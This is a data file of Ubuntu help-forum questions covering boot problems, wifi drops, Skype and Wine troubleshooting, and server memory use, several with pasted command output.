392838	windows 7 committed wubicide . how do i avoid it in the future ?	so , bit of background first . i have an asus laptop with two partitions on the same disk , c : ( os ) and d : ( data ) . i 'd set all of my windows default folders ( documents , downloads , & c ) to live on d : because it 's much bigger . then i decide that i 'm going to slowly move toward linux while keeping windows for the utility stuff i still need for work ( like civ5 ) . i install ubuntu on d : \ubuntu - bearing in mind there 's still a lot of other d : * stuff , since i want to be able to access documents that i 've stored there both in windows and ubuntu . that install worked fine at first ... i got everything installed that i needed to in order to be able to be using ubuntu about 90 % of the time i was using my machine . that lasted about five days . at one point , while i was using windows , i got a notice that there were updates that needed installing ; i let them install while i was shutting out of windows . when i restarted , i knew i should boot windows first because it had to finish configuring updates . i got a notice that there may be some disk corruption on d : , and the menu would n't really let me go farther without running sandisk . that ran , i booted into windows , let the updates finish , shut down again , tried to boot ubuntu and got error messages which eventually led me to things like this : how do i remove the extra ubuntu option on the windows boot manager menu ? when i eventually booted windows , i found everything ( including the previously-mentioned windows default folders ) gone from d : . 100 % free disk space , no backup , apart from the fact that most important files there were already dropbox 'd . now , i want to reinstall ubuntu , and if possible , to have windows go back to the practice of storing data on d : so i can access it while using either os , but for safety 's sake , i moved all those default folders back over to their normal locations on c : . i 'm willing to give that up if that 's what caused the problem ( if anything , it might accelerate my departure from windows ) , but most importantly , i do n't want to go and do all of this just to have windows wipe the slate clean again . any ideas ?
392844	if i install windows and ubuntu in the same disc , which one is better to instal first ? will i need anti virus in ubuntu for windows virus ?	is it better to install ubuntu or windows first ? will i need to install an anti virus in ubuntu for windows virus ? if i install windows first , do i need to format windows partition or ubuntu takes part of the disc and formats in ext4 ? thank you .
392845	ubuntu installation on minix neo x5	i have a mini pc `` minix neo x5 '' running android on it . i would like to install ubuntu on it . it has rk3066 chip i guess . i am not a geek , but i can understand installation procedure . is there any version/form of ubuntu available for this kind of pc system ? raj
392847	question about using ubuntu fonts inside a website as @ font-face	i 'm a web developer and i want to use ubuntu font for many ( non commercial and commercial ) websites . i have read the license text file and still did n't get it . can i freely use all ubuntu fonts ?
392849	custom live cd failing to boot	i 'm trying to create a custom live cd of ubuntu 13.10 with an updated kernel among a couple other preinstalled applications . i 'm following this guide , which is a bit tedious , but i ca n't get any other software to work correctly either ( such as ubuntu customization kit ) . the issue that i keep running into is when i try to boot the iso image in qemu or virtualbox . i get an error that says : mount : mounting /dev/sr0 on /cdrom failed : no such device i 'm at a loss with this error message , i 've tried searching a solution but i have n't found anything conclusive . if anyone has any ideas , please let me know . it would be nice .
392850	encryption problem with chromium	i recently re-installed chromium web browser . upon starting 'er up , the error box that appears says ; ` '' did n't sign in to chromium , '' and the mouse click then takes me to the login page where after i enter my information , says : you already have data that is encrypted using a different version of your google account password . please enter it below . '' and there is a box that says passphrase in ghost letters . when i enter the passphrase for that , the browser crashes to desktop . the help files have nothing about this . tia
392854	what makes specific services ( apache2 , mysql ) autostart ?	where can i set services apache2 and mysql to do not start automatically ? or start when asked for it instead ? edit bootup-manager worked for me very well disabling autostart of both services .
392858	what are the original default files contained in the /usr/share folder ?	can someone please just give me a list of the default files and folders that you would find in /usr/share folder after installation ? you would not believe how difficult this is to find .
392863	disable/remove initrd image during booting	i am trying to boot linux ( ubuntu 12.10 ) without an initrd image . there are various sources online , but i 'm not able to find anything that is detailed . there are many pointers as to how to achieve this . so i tried to do this myself , and obviously ran into problems . the general idea is : configure and re-build the kernel , to disable initramfs and ram disk support ( i did this to optimize for size , maybe optional ) also make sure to make all drivers available configure grub to not load an initrd image the root filesystem should be sufficiently modified to be able to boot easily ( which i have no clue how ) theoretically , initrd is used to solve the chicke-egg problem . there are drivers necessarily be loaded to load the kernel . i have done the following on my system . kernel configure ram filesystem and ram disk support i disabled this , which can be found in general support in the make menuconfig option menu ! [ ram filesystem and ram disk support ] [ 1 ] ram block device i disabled the ram block device support ! [ ram block device support ] [ 2 ] grub configure in the grub boot screen , i hit e and and edited the command line , and removed the line initrd /boot/initrd.img-3.12.4 the result the final result was a kernel that hung during : loading initial ramdisk ... although , i removed ramdisk support from the kernel i built , the kernel does n't seem to load . i 'm obviously missing something . do i need to modify init scripts in the kernel i built , to make the bootloader not load the initrd image . this would mean i use the busybox init scripts . grub modifications ? i analyzed the grub script that loads the kernel , it does a few module insertions , like insmod part_dos insmod ext2 will it be possible for me to insert a few kernel modules that is required to boot the kernel and boot the kernel with noinitrd option ? and further the boot time that is reduced when initrd is n't used , should be great . so do systems with single digit boot-time have initrd images . ps : to anyone wondering why i want to disable initrd in the first place , i am doing this as a good learning experience . thank you .
392864	adding repository error	i 'm trying to add a repository on my vps with ubuntu 12.04 installed using this command : sudo add-apt-repository ppa : chris-lea/node.js but terminal is showing command not found then i 've entered the following command to solve the problem sudo apt-get install software-proprieties-common but unfortunately i 'm getting the following error : e : unable to locate package software-proprieties-common how can i solve this problems ? update now software-properties-common installed , but same problem continues . please check the screen shot . update 2 problem continues
392867	my pc wo n't boot	my pc wo n't boot at all . when i try to boot it , my monitor gives me a message that says the resolution that my pc is giving it is larger than it can display . half the time i boot it , when i press control alt delete , it acts like a dos prompt and it restarts . once in a while if i 'm lucky , i get message saying that my graphics drivers are incompatible and they are compatible with the system . my pc is just a few years old , and i am thinking of trading it in . please help me . very annoyed ubuntu user . p.s . my pc is a compact presario unknown model number . the graphics is nividia . the cpu is an amd athlon . my ram is 3 gigabytes . hard drive 80 gigabytes . ( when the pc used to boot , it said it had 500 gigabyes xd . ) not connected to the internet . monitor is 1440 by 900 .
392868	i install my ubuntu , but can not get into it	can not get into linux system'/ ' 20480m , '/boot'200m , 'swap'1024m , /home 25g , then i choose '/boot ' as the device.and then i use easybcd according to the instrouction.when i restart , there are grub , i do not no what to do next.help me ! ! !
392869	compile 64 bit kernel in 32 bit	i have an installation of 13.10 ubuntu 32bit . also , i 've also found a way to install 64 kernel into the system ( of 32bit applications ) . so , could i compile a 64 bit kernel in the 32 bit system with a 64 bit kernel ? do i have to create a 64bit chroot to accomplish this ?
392872	how disconnect clients on wifi router ?	i have one wifi router and it 's connected by cable to my pc that is running ubuntu 13.10 i want to disconnect clients are connected by wifi to router , i tried linux commands like `` tcpkill '' , '' iptables drop '' , ... but it did n't work .
392873	file opening question	whenever i download a file it will not open . it acts like it is going to but it doesnt . also when i open the location in files and double click on it , the program wo n't open . i have to right click and select the file . can any one tell me how to fix this issue ? thanks , king
392874	ubuntu server 12.04 : bad archive mirror	i get stucked when installing ubuntu server 12.04 on my laptop . when it comes to `` choose a mirror of the ubuntu archive '' , i get 'bad archive mirror ' error . i 've tried many times with other options provided , but still got the error . how to solve this ? can anyone help me ? p/s : sorry i am quite newbie in ubuntu . but familiar with ubuntu desktop . regards , -ismi
392878	mininet problem in allocating ip address	i have encountered a problem in mininet . the eth0 is allocated to nat in mininet and has a certain ip address to connect to the internet . but when i define a host only adaptor , the ipv4 is allocated and ipv6 is empty of any value and the ipv6 network mask length is 0 ... ... but after i click on the ok button and open it again the ipv6 had a value ! ! ! the most important problem is when i add a host-only adapter to mininet , run the command ifconfig -a it did n't allocate any ip address to it , and it is written : up broadcast running multicast . when i want to do dhclient eth1 for allocating the ip address , the mininet did not work . i also googled it , but i could n't find any related topic for my problem or an executable solution . i want to know how i can disable the ipv6 or how i can allocate an ip address to it
392880	not able to copy any folder from samba share network	i am connected to a windows network and i am coping a directory from my windows share , it starts coping but the progress bar stops in the middle without any error message and it does not copy . but i am able to copy single files through same folder without any pause..but when i select more than two files and try to paste them in my desktop they got stop in the middle . any solutions ? ?
392883	creating an install drive - can not open output file autorun.inf	i am trying to make an install/boot drive for a computer that has no operating system and no optical drive . i used the iso from ubuntu.com and the burner from pendrivelinux.com . when the program starts writing to the flash drive , there is an error displayed that says : '' 0 can not open output file e : \autorun.inf '' but continues to write data . after it has finished , i remove the drive and insert to the other computer and turn it on , but it never finds a drive to boot from . what is causing this problem and how can i fix it ?
392884	can not connect to wifi with wpa2 aes encryption security	i am using ubuntu 12.04 and i am having a problem in connecting to the router with wpa2 security with aes encryption . i am able to connect to that router using my cellphone , windows pc but my ubuntu machine can not connect . does ubuntu support aes encryption for wifi devices ? previously when i was using ubuntu 10.10 there was no problem like this .
392885	how to see the contents of tar.gz file without extracting ?	i want to see the contents ( list of files and folders ) of tar.gz file without extracting it . is there any methods of seeing that ?
392886	how to install cad medusa4 in ubuntu 12.04	i am totally new using ubuntu but what i have used from the software has been really good , i found and use the following procedure to install `medusa4 : ... ... ... ... ... . download : medusa4_v4_0_0_linux_personal.sh after downloading the above file , it needs to be marked as executable , so it can be run . to do this , run : chmod +x medusa4_v4_0_0_linux_personal.sh in a terminal it needs to be executed as root , so use sudo : sudo ./medusa4_v4_0_0_linux_personal.sh ... ... ... ... ... ... but i still have troubles to complete the installation , in the terminal display the following message : '' there is no csh or tcsh shell available ... it 's required to install and run medusa4 personal v5.1.2 copyright ( c ) 2002-2012 cad schroer gmbh '' how to fix this ? i hope someone can help me to install this software .
392888	is it possible to change default graphics when running dvd in demo ?	when booting kubuntu 13.10 on a dell inspiron 9300 laptop from the dvd in demo mode most desktop fonts are screwed ( to higher resolution ? )
392890	notabene 10 under wine	i am trying to run notabene in ubuntu under wine . i think i managed to install it , but when i try to run it the screen changes to the wine screen and then after a few moments it disappears and i 'm back in the ubuntu desktop . under `` properties '' i tried setting the permission but as i click the box and after about 1 sec the `` click '' tick disappears - i take it the software does n't like the notabene exe file . any ideas of where i go from here , please ? allan linal.williams @ metroweb.co.za
392891	wifi keeps on and off all all the time	i have a acer travilmate . after installing ubuntu and connecting to a wireless network , my wifi keeps turning on and off all the time , i hardly could do anything this is really annoying because it stop me doing anything , i hardly load a video or game . is there any way to fix this and just let the wifi work as is required ? result of lspci -nnk | grep -ia2 net : lspci -nnk | grep -ia2 net 00:1f.3 smbus [ 0c05 ] : intel corporation nm10/ich7 family smbus controller [ 8086:27da ] ( rev 02 ) subsystem : acer incorporated [ ali ] device [ 1025:0110 ] 02:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8038 pci-e fast ethernet controller [ 11ab:4352 ] ( rev 14 ) subsystem : acer incorporated [ ali ] device [ 1025:0110 ] kernel driver in use : sky2 03:00.0 network controller [ 0280 ] : intel corporation pro/wireless 3945abg [ golan ] network connection [ 8086:4222 ] ( rev 02 ) subsystem : intel corporation pro/wireless 3945bg network connection [ 8086:1005 ] kernel driver in use : iwl3945 0a:09.0 cardbus bridge [ 0607 ] : texas instruments pcixx12 cardbus controller [ 104c:8039 ] result of lsmod : lsmod module size used by parport_pc 31981 0 ppdev 17391 0 bnep 18893 2 rfcomm 53664 16 btusb 23443 0 bluetooth 323622 22 bnep , btusb , rfcomm coretemp 13195 0 joydev 17097 0 acer_wmi 31735 0 sparse_keymap 13708 1 acer_wmi snd_hda_codec_si3054 12864 1 snd_hda_codec_realtek 45592 1 gspca_vc032x 31199 0 gspca_main 27772 1 gspca_vc032x videodev 107508 2 gspca_vc032x , gspca_main snd_hda_intel 42658 3 snd_hda_codec 164003 3 snd_hda_codec_realtek , snd_hda_codec_si3054 , snd_hda_intel arc4 12536 2 snd_hwdep 13272 1 snd_hda_codec snd_pcm 89488 3 snd_hda_codec_si3054 , snd_hda_codec , snd_hda_intel iwl3945 63619 0 snd_page_alloc 14230 2 snd_pcm , snd_hda_intel microcode 18830 0 iwlegacy 87971 1 iwl3945 i915 589697 3 snd_seq_midi 13132 0 mac80211 513247 2 iwl3945 , iwlegacy snd_seq_midi_event 14475 1 snd_seq_midi snd_rawmidi 25094 1 snd_seq_midi psmouse 90642 0 snd_seq 55383 2 snd_seq_midi_event , snd_seq_midi pcmcia 51368 0 snd_seq_device 14137 3 snd_seq , snd_rawmidi , snd_seq_midi cfg80211 401436 3 iwl3945 , iwlegacy , mac80211 drm_kms_helper 46867 1 i915 serio_raw 13189 0 snd_timer 24447 2 snd_pcm , snd_seq drm 242354 4 i915 , drm_kms_helper snd 60790 17 snd_hda_codec_realtek , snd_hda_codec_si3054 , snd_hwdep , snd_timer , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi yenta_socket 40193 0 soundcore 12600 1 snd pcmcia_rsrc 18319 1 yenta_socket tifm_7xx1 13163 0 pcmcia_core 22328 3 pcmcia , pcmcia_rsrc , yenta_socket i2c_algo_bit 13197 1 i915 lpc_ich 16864 0 tifm_core 15040 1 tifm_7xx1 wmi 18590 1 acer_wmi video 18777 2 i915 , acer_wmi mac_hid 13037 0 lp 13299 0 parport 40795 3 lp , ppdev , parport_pc hid_generic 12492 0 usbhid 47361 0 hid 87370 2 hid_generic , usbhid sky2 52910 0 result of iwconfig : iwconfig wlan0 ieee 802.11bg essid : '' etisalat '' mode : managed frequency:2.412 ghz access point : c8 : d1:5e:5b : cb:2c bit rate=54 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=65/70 signal level=-45 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:2 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . result of ifconfig -a : ifconfig -a eth0 link encap : ethernet hwaddr 00:16:36:9b : da:24 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1545 errors:0 dropped:0 overruns:0 frame:0 tx packets:1545 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:116454 ( 116.4 kb ) tx bytes:116454 ( 116.4 kb ) wlan0 link encap : ethernet hwaddr 00:18 : de:46 : aa:77 inet addr:192.168.1.6 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :218 : deff : fe46 : aa77/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2512 errors:0 dropped:0 overruns:0 frame:0 tx packets:2634 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:892621 ( 892.6 kb ) tx bytes:478504 ( 478.5 kb ) result of sudo iwlist scan : sudo iwlist scan wlan0 scan completed : cell 01 - address : c8 : d1:5e:5b : cb:2c channel:1 frequency:2.412 ghz ( channel 1 ) quality=60/70 signal level=-50 dbm encryption key : on essid : '' etisalat '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=0000000fee9c2e01 extra : last beacon : 44ms ago ie : unknown : 000845746973616c6174 ie : unknown : 010882848b961224486c ie : unknown : 030101 ie : unknown : 2a0100 ie : unknown : 32040c183060 ie : unknown : 2d1a8c0103ffff0000000000000000000000000000000c0000000000 ie : unknown : 3d1601000700000000000000000000000000000000000000 ie : unknown : 3e0100 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 ie : unknown : dd07000c4307000000 ie : unknown : 0706454720010d10 lo interface does n't support scanning . eth0 interface does n't support scanning . result of cat/etc/resolv.conf : cat/etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwrittennameserver 127.0.1.1
392892	how to open my desktop ?	i 'm using ubuntu 13.04 in my desktop . in my login screen i use one user account with password , after login with correct password , system again go to login page without any error . again and again i 'm doing this , but nothing happen , what is wrong with my pc .
392893	switch language problem in ubuntu 13.10	sometimes when i try to switch my language in ubuntu 13.10 , the language switching crashes for a while . i press the switch combination keys a few times , but nothing happens and after a moment , the language starts to change for the number of times that i pressed the change language keys . how can i solve this problem ? note that my ubuntu is up to date .
392894	how to dual boot ubuntu with windows 8 in a laptop with earliar windows 7 in it ?	i am having lenovo ideapad z570 which came with windows 7 home premium pre-installed with it.i have now removed windows 7 and installed windows 8 in it.but now when i am trying to install ubuntu alongside , the grub menu is n't showing at startup . i tried to install ubuntu 12.04.3 and then 12.10.once i did boot-repair also but after this , it ended up with grub-rescue . is there a way to install ubuntu .should i try with newer versions of ubuntu like 13.04 ?
392897	installation of ubuntu onto blank acer laptop	i have downloaded ubuntu 13.10 from my new laptop , saved it onto a usb stick and want to install the os onto the 'old ' acer laptop . at start i hit f2 to go to bios menu i allocate 1 ) usb cd/dvd rom 2 ) usb key 3 ) usb ffd 4 ) usb hdd : usb disc- ( usb 2.0 ) priority order . i keep getting- '' windows could not start because of a computer disk hardware problem '' please can you advise me ?
392898	i see a screen full of skinny stripes instead of grub , why is that ?	all graphics drivers activated , using the nvidia 304 something , without the `` [ recommended ] '' phrase after it ( there 's two 304 's ) . i fixed it be enabling mbr , but ca n't access ubuntu any more , should i reinstall grub and give it a try ?
392899	ubuntu 13.10 fails to suspend on closing laptop lid	i 'm running ubuntu 13.10 on a lenovo thinkpad edge e330 . before upgrading to 13.04 , when i closed my laptop lid , the laptop would suspend . however , it does n't do so now . the laptop heats up noticeably , and i get multiple windows asking me to enter passwords for wifi and telling me that the computer will suspend due to inactivity . this only seems to happen when the laptop is running on battery . options in power settings are set to suspend on closing lid , both when running on ac and battery .
392900	how to transfer music to iphone 4 ?	i 'm using ubuntu 13.10 and i updated my iphone 4 's ios to 7.0.4 ( not jail-broken ) but i ca n't sync music using rhythmbox or any other tool , although my iphone is detected when i plug it ( new windows opens contains folders and files ) but rhythmbox does n't find it . i 've searched every possible link or tool or blog and nothing seems to work , but this thing is driving me crazy . please help .
392905	nothing happens after installing dual boot windows 8	i was installing ubuntu 12.04 on my usb using lili usb creator . i install it then done ( i choose the install alongside windows 8 option ) , after that i restart my laptop then i directly send to windows 8 i reinstall it and it goes the same problem .
392911	wine sound is played way too fast and crackles horribly	sounds in my applications are played in super speed and are crackling horribly . in spotify , the songs are actually playing at around 3x speed . i have googled this quite a bit and all i can come up with is a bug report from january 2012 which is marked as closed . i have tested spotify and hearthstone using playonlinux with wine versions 1.5.0 , 1.6 , 1.6.0 , 1.7.0 , 1.7.8 as well as the system wine which is version 1.4.1 . they all have the exact same terrible crackling sound issue . this leads me to assume that this is not a bug with wine . the steps to reproduce from the bug report : steps to reproduce : 1. winecfg 2. go to audio tab 3 . test sound actual results : crackling sounds produced expected results : normal output are also producing crackling noises for me . while doing it , winecfg printed the following to the terminal : p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : can not open shared object file : no such file or directory err : ole : coinitializeex attempt to change threading model of this apartment from multi-threaded to apartment threaded alsa lib pcm.c:7843 : ( snd_pcm_recover ) underrun occurred alsa lib pcm.c:7843 : ( snd_pcm_recover ) underrun occurred alsa lib pcm.c:7843 : ( snd_pcm_recover ) underrun occurred alsa lib pcm.c:7843 : ( snd_pcm_recover ) underrun occurred ( the first line showed up as i opened winecfg , the last 5 showed up when i clicked test sound ) any clues what could be wrong ? let me know if i can provide any more information . pulseaudio 1:4.0-0ubuntu6 amd64
392918	internet keeps connecting and disconnecting .	i 'm running ubuntu 12.04 lts , and my internet keeps going in and out , this is very frustrating . i am brand new to linux , so how can i fix this ? so far what i 've been reading , i do n't really understand . please help !
392920	microsoft skype quit permanently for linux ? skype is not working on ubuntu 12.10 , 13.04 , 13.10	except this last skype , https : //docs.google.com/file/d/0b615boluutvbmmlpem1dwhlwmmm/edit ? pli=1 there is no other skype working in ubuntu . where to get skype for 13.10 - 64-bit ? root @ sun-m14xr2 : ~/downloads # dpkg -i skype- skype-4.2.0.11/ skype-ubuntu-precise_4.2.0.11-1_i386.deb root @ sun-m14xr2 : ~/downloads # dpkg -i skype- skype-4.2.0.11/ skype-ubuntu-precise_4.2.0.11-1_i386.deb root @ sun-m14xr2 : ~/downloads # dpkg -i skype-ubuntu-precise_4.2.0.11-1_i386.deb selecting previously unselected package skype . ( reading database ... 231637 files and directories currently installed . ) unpacking skype ( from skype-ubuntu-precise_4.2.0.11-1_i386.deb ) ... dpkg : dependency problems prevent configuration of skype : skype depends on libasound2 ( > = 1.0.23 ) ; however : package libasound2 : i386 is not installed . dpkg : error processing skype ( -- install ) : dependency problems - leaving unconfigured processing triggers for hicolor-icon-theme ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : skype edit : the default download .deb file is never working root @ sun-m14xr2 : ~/downloads # skype skype : error while loading shared libraries : libasound.so.2 : can not open shared object file : no such file or directory root @ sun-m14xr2 : ~/downloads # ldd /usr/bin/skype linux-gate.so.1 = > ( 0xf7754000 ) libasound.so.2 = > not found libxv.so.1 = > /usr/lib/i386-linux-gnu/libxv.so.1 ( 0xf5943000 ) libxss.so.1 = > /usr/lib/i386-linux-gnu/libxss.so.1 ( 0xf593e000 ) librt.so.1 = > /lib/i386-linux-gnu/librt.so.1 ( 0xf5935000 ) libdl.so.2 = > /lib/i386-linux-gnu/libdl.so.2 ( 0xf5930000 ) libx11.so.6 = > /usr/lib/i386-linux-gnu/libx11.so.6 ( 0xf57f8000 ) libxext.so.6 = > /usr/lib/i386-linux-gnu/libxext.so.6 ( 0xf57e6000 ) libqtdbus.so.4 = > /usr/lib/i386-linux-gnu/libqtdbus.so.4 ( 0xf5766000 ) libqtwebkit.so.4 = > /usr/lib/i386-linux-gnu/libqtwebkit.so.4 ( 0xf402d000 ) libqtxml.so.4 = > /usr/lib/i386-linux-gnu/libqtxml.so.4 ( 0xf3fed000 ) libqtgui.so.4 = > /usr/lib/i386-linux-gnu/libqtgui.so.4 ( 0xf351d000 ) libqtnetwork.so.4 = > /usr/lib/i386-linux-gnu/libqtnetwork.so.4 ( 0xf33da000 ) libqtcore.so.4 = > /usr/lib/i386-linux-gnu/libqtcore.so.4 ( 0xf30f7000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xf30dc000 ) libstdc++.so.6 = > /usr/lib/i386-linux-gnu/libstdc++.so.6 ( 0xf2ff0000 ) libm.so.6 = > /lib/i386-linux-gnu/libm.so.6 ( 0xf2fc4000 ) libgcc_s.so.1 = > /lib/i386-linux-gnu/libgcc_s.so.1 ( 0xf2fa7000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xf2dfc000 ) /lib/ld-linux.so.2 ( 0xf7755000 ) libxcb.so.1 = > /usr/lib/i386-linux-gnu/libxcb.so.1 ( 0xf2dd9000 ) libdbus-1.so.3 = > /lib/i386-linux-gnu/libdbus-1.so.3 ( 0xf2d8d000 ) libsqlite3.so.0 = > /usr/lib/i386-linux-gnu/libsqlite3.so.0 ( 0xf2cdf000 ) libxrender.so.1 = > /usr/lib/i386-linux-gnu/libxrender.so.1 ( 0xf2cd5000 ) libgstapp-0.10.so.0 = > /usr/lib/i386-linux-gnu/libgstapp-0.10.so.0 ( 0xf2cc7000 ) libgstinterfaces-0.10.so.0 = > /usr/lib/i386-linux-gnu/libgstinterfaces-0.10.so.0 ( 0xf2cb5000 ) libgstpbutils-0.10.so.0 = > /usr/lib/i386-linux-gnu/libgstpbutils-0.10.so.0 ( 0xf2c93000 ) libgstvideo-0.10.so.0 = > /usr/lib/i386-linux-gnu/libgstvideo-0.10.so.0 ( 0xf2c75000 ) libgstbase-0.10.so.0 = > /usr/lib/i386-linux-gnu/libgstbase-0.10.so.0 ( 0xf2c14000 ) libgstreamer-0.10.so.0 = > /usr/lib/i386-linux-gnu/libgstreamer-0.10.so.0 ( 0xf2b2c000 ) libgobject-2.0.so.0 = > /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( 0xf2adc000 ) libglib-2.0.so.0 = > /lib/i386-linux-gnu/libglib-2.0.so.0 ( 0xf29e0000 ) libfontconfig.so.1 = > /usr/lib/i386-linux-gnu/libfontconfig.so.1 ( 0xf29a8000 ) libaudio.so.2 = > /usr/lib/i386-linux-gnu/libaudio.so.2 ( 0xf298f000 ) libpng12.so.0 = > /lib/i386-linux-gnu/libpng12.so.0 ( 0xf2965000 ) libz.so.1 = > /lib/i386-linux-gnu/libz.so.1 ( 0xf294c000 ) libfreetype.so.6 = > /usr/lib/i386-linux-gnu/libfreetype.so.6 ( 0xf28b2000 ) libsm.so.6 = > /usr/lib/i386-linux-gnu/libsm.so.6 ( 0xf28a9000 ) libice.so.6 = > /usr/lib/i386-linux-gnu/libice.so.6 ( 0xf288f000 ) libxi.so.6 = > /usr/lib/i386-linux-gnu/libxi.so.6 ( 0xf287f000 ) libxau.so.6 = > /usr/lib/i386-linux-gnu/libxau.so.6 ( 0xf287b000 ) libxdmcp.so.6 = > /usr/lib/i386-linux-gnu/libxdmcp.so.6 ( 0xf2874000 ) liborc-0.4.so.0 = > /usr/lib/i386-linux-gnu/liborc-0.4.so.0 ( 0xf27e5000 ) libgmodule-2.0.so.0 = > /usr/lib/i386-linux-gnu/libgmodule-2.0.so.0 ( 0xf27df000 ) libxml2.so.2 = > /usr/lib/i386-linux-gnu/libxml2.so.2 ( 0xf2690000 ) libffi.so.6 = > /usr/lib/i386-linux-gnu/libffi.so.6 ( 0xf2689000 ) libpcre.so.3 = > /lib/i386-linux-gnu/libpcre.so.3 ( 0xf2649000 ) libexpat.so.1 = > /lib/i386-linux-gnu/libexpat.so.1 ( 0xf2621000 ) libxt.so.6 = > /usr/lib/i386-linux-gnu/libxt.so.6 ( 0xf25c3000 ) libuuid.so.1 = > /lib/i386-linux-gnu/libuuid.so.1 ( 0xf25bd000 ) liblzma.so.5 = > /lib/i386-linux-gnu/liblzma.so.5 ( 0xf2597000 ) root @ sun-m14xr2 : ~/downloads # apt-get install libasound reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libasound root @ sun-m14xr2 : ~/downloads # apt-get install libasound2 reading package lists ... done building dependency tree reading state information ... done libasound2 is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : skype : i386 : depends : libasound2 : i386 ( > = 1.0.23 ) recommends : sni-qt : i386 but it is not going to be installed recommends : libasound2-plugins : i386 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
392924	mp3 file playing problem ( ubuntu_13.10 )	i am new in ubuntu . i have faced a critical problem in playing audio file like mp3 format . actually it can play mp3 after installing ubuntu restricted extras but it ca n't play mp3 file clearly , it creates some noise . and also default player is unable to play mp4 . so what can i do now ?
392926	plymouth script - center title	i want to use a custom texttheme for plymouth on startup . how can i center the title of this screen ? the dots show centered , but the text seems to go off the screen to the right . this is my `` test-theme.plymouth '' : [ plymouth theme ] name=testtheme description=text mode theme modulename=test-theme [ ubuntu-text ] title=some sample text black=0x2c001e white=0xffffff brown=0xff4012 blue=0x988592
392927	black screen with x cursor no access to terminal from there	ubuntu 13 after rebooting i get a black screen with an x cursor without any access to terminals i think . i do n't know how to fix or even start fixing this .
392928	install ubuntu on external hard drive	my hard disk is bad and instead of buying a new one i would prefer to boot from my external hard drive . i installed 13.10 on it . when i boot i get 1.168876 kernel panic- not syncing : no init found . try passing init ) option to kernel i followed the instructions here : installing ubuntu on external hard disk i have tried booting with the hard drive connected and disconnected . i installed with it disconnected . seemed to hang up with it connected . when i look at the files on the hard drive , i notice there are no files under home/gary except `` examples . '' i ran a smart test using gsmart control and the quick test says all is normal . the extended test keeps crashing . i tried copying a file to the drive but i get an error message saying the operation was completed with errors . the file is not copied to the drive . thanks for any suggestions .
392930	ubuntu vps > pptp error 806 and 619	i configured pptp server on my ubuntu vps ( located europe ) . i want to access my vps server through pptp from our lan which is located in qatar . in my client machine win 7 , i configured pptp client.but it shows error 806 and 619.what is the problem ?
392931	mp3 file playing problem ubuntu_13.10	i am new in ubuntu . i have faced a critical problem in playing audio file like mp3 format . actually it can play mp3 after installing ubuntu restricted extras but it ca n't play mp3 file clearly , it creates some noise . and also default player is unable to play mp4 . so what can i do now ? the problem in details : suppose a audios length is 5min and if i open this audio to play first 10 or 12 sec it will run smoothly but sometimes it make a sound like- ( when we plugin a bad dvd into a dvd drive the drive creates a sound and my noise is like this sound and some spech of the songs are skip for this ) and audios are keep running
392941	ubuntu server wont recognize ethernet	i have recently acquired an old computer that i tried to install ubuntu 12.04.3 server onto , however the system could not be booted into any external medias ( usb and cd drives ) . so i hooked the hard drive into another computer of mine and installed the os , then when i booted the server up it could not ping any web address or dns from the internet . i narrowed the problem down to the fact that the ethernet port has not been configured . to back this up i ran ifconfig -a | grep eth and the result was eth1 link encap : ethernet hwaddr 00:08:74 : c3:2f : df next i ran ifdown eth1 & & ifup eth1 and the result was two lines . the first line result was ifdown : interface eth1 not configured and the second line read ignoring unknown interface eth1=eth1 . i just need to get this connected to the internet , but it is not enabling the ethernet port , are there any commands that will enable me to manually activate the ethernet so i can get internet connection ? ' the machine is a dell dimension 2350 .
392942	php-fpm high memory and cpu usage	my real ram and virtual memory is of each 1 gb . but php5-fpm uses very high memory approx 885mb . i searched for solutions but there is no effect . i have wordpress site and currently at a time there are ony 8 to 12 visitors . ps -ylc php5-fpm -- sort : rss | awk ' ! /rss/ { s+= $ 8 } end { printf `` % s\n '' , `` total memory used by php-fpm child processes : `` ; printf `` % dm\n '' , s/1024 } ' total memory used by php-fpm child processes : 885m please help me to come out of this situation .
